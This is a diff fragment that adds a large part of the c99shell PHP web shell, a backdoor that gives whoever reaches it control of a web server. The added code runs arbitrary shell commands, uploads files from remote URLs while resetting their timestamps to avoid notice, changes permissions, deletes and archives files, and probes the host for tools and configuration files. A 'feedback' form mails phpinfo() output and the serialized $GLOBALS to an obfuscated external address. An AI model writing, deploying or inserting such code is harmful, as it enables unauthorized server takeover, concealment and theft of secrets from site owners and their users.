+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = true;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== false) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  //Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
